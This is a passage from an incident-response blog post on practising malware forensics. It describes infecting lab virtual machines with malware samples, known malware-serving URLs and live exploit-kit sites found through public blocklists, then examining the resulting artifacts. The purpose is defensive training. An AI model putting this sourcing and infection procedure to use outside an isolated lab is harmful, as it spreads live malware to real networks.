are making sure the process and tools work for you. You are also looking to explore the artifacts created during the infection. You know the behavior of the known malware so don't focus on this. Malware is different and so will be their artifacts. Focus on the artifacts created by a program executing in the operating system you selected. Artifacts such as program execution, logs, and file system. [h=3]Using Unknown (to you) Samples[/h] Using a known sample is helpful to get your feet wet but it gets old pretty quick. After you used a few different known samples it is not as challenging to find the artifacts. This is where you take the next step by using an unknown (to you) sample. Just download a random sample from one of the sources listed at malware sample sources for researchers. Infect your virtual machine (VM) with it and then power it down. If the VM has any snapshots then delete them to make it easier. Now you can start your examination using the same process and tools you used with a known malware sample. This method makes it a little more challenging because you don't know what the malware did to the operating system. [h=2]Automatically Infecting Systems[/h] The manual method is an excellent way to explore the malware forensic process. It allows you to get familiar with an examination process, tools, and artifacts associated with an infection. One important aspect about performing malware forensics is to identify the initial infection vector which was used to compromise the system in the first place. The manual method infections always trace back to you executing malware samples so you need to use a different method. This method is automatically infecting systems to simulate how real infections appear. Before proceeding there is a very important configuration change. The virtual machine's network configuration needs to be connected to the Internet. This can be done through the NAT or bridged configuration but you will want to be in a controlled environment (aka not your company's production network). There are some risks with doing this so you will need to take that into consideration. Personally, I accept this risk since improving my skills to help protect organizations is worth the trade off. [h=3]Using Known Websites Serving Malware[/h] In the automatically infecting systems approach the first method is to use a known website serving malware. There are different ways to identify these websites. I typically start by referring to Scumware.org (FYI, site hates Internet Explorer), Malc0de database, and the Malware Domain List. In both instances I look for URLs that point to a malicious binary. Other sources you can use are the ones listed by Lenny Zelster on his Blocklists of Suspected Malicious IPs and URLs page. Again, you are trying to find a URL to a site hosting a malicious binary. Another, source you shouldn't overlook is your email SPAM/Junk folder. I have found some nice emails with either malicious attachments or malicious links. Lastly, if you pay attention to the current trends being used to spread malware then you can found malicious sites leveraging what you read and Google. This is a bit harder to pull off but it's worth it since you see a technique currently being used in attacks. Inside your VM open a web browser, enter in the URL you identified, and if necessary click any required buttons to execute the binary. Wait a minute or two for the malware to run and then power it down. If the VM has any snapshots then delete them to make it easier. Now you can start your examination using the same process and tools you used with the manual approach. The purpose is to find the malware, artifacts associated with the infection, and the initial infection vector. Infecting a VM in this manner simulates a social engineering attack where a user is tricked into infecting themselves. If a SPAM email was used then it simulates a email based attack. To see how beneficial this method is for creating test images to analyze you can check out my posts Examining IRS Notification Letter SPAM and Coming To A System Near You. The first post simulates a phishing email while the later simulates social engineering through Google image search. [h=3]Using Potentially Malicious Websites[/h] The second method in the automatically infecting systems approach is to use potentially malicious websites. This method tries to infect the VM through software vulnerabilities present in either the operating system or installed client-side applications. This is the most time consuming out of all of the methods I described in this post. It's pretty hard to infect a VM on purpose so you will end up going through numerous URLs before hitting one that works. This is where you may need to use the VM snapshot feature. To find potentially malicious URLs you can look at the Malware Domain List. Look for any URLs from the current or previous day that are described as exploit or exploit kit as shown below. You can ignore the older URLs since they are most likely no longer active. Another option I recently discovered but haven't tried yet is using information posted at Malware-Traffic-Analysis.net. The site doesn't obfuscate websites used so you may be able to use it to find active websites serving up exploits. The last option I'm sharing is the one I use the most; the URLs others are submitting to URLQuery.net. Just keep in mind, there are certain things that can't be unseen and there are some really screwed up people submitting stuff to URLQuery. When reviewing the submitted URLs you want to pay attention to those that have detections as shown below: After you see a URL with detections then you'll need to examine it closer by reviewing the URLQuery report. To save yourself time, focus on any URLs whose reports mention: malicious iframes, exploits, exploit kits, or names of exploit kits. These are the better candidates to infect your VM. The pictures below show what I am referring to. Before proceeding make sure your VM is powered on and you created a snapshot. The snapshot comes in handy when you want to start with a clean slate after visiting numerous URLs with no infection. An easy way to determine if an infection occurred is to monitor the program execution artifacts. One way I do this is by opening the C:\Windows\Prefetch folder with the items sorted by last modification time. If an infection occurs then prefetch files are modified which lets me know. Now you can open a web browser inside your VM, enter in the URL you identified, and monitor the program execution artifacts (i.e. prefetch files). If nothing happens then move on to the next URL. Continue going through URLs until one successfully exploits your VM. Upon infection wait a minute or two for the malware to run and then power it down. Make sure you delete any snapshots to make it easier. Now you can start your examination using the same process and tools you have been using. The purpose is to find the malware, artifacts associated with the infection, and the initial infection vector. The initial infection vector will be a bit of a challenge since your VM has various vulnerable programs. Infecting a VM in this manner simulates a drive-by which is a common attack vector used to load malware onto a system. To see how beneficial this method is for creating test images you can check out my post Mr Silverlight Drive-by Meet Volatility Timelines (FYI, I suspended the VM to capture the vmem file in addition instead to powering it down to get the disk image). [h=2]Summary[/h] Benjamin Franklin said "by failing to prepare, you are preparing to fail." To be successful when confronted with a system potentially impacted with malware we should be preparing for this moment now. Taking the time to improve our malware forensic skills including our process, tools, and knowledge of artifacts. Making the right preparations so when game day approaches we will come out on top. The process I use to improve my malware forensic skills and the one I described in this post is not for everyone. It takes time and a lot of work; I've spent countless days working through it. However, working your way through this process you will attain something that can't be bought with money. There is no book, training, college course, or workshop that can replicate or replace the skills, knowledge, and experience you gain through careful preparation by training yourself. Sursa: Journey Into Incident Response: Improving Your Malware Forensics Skills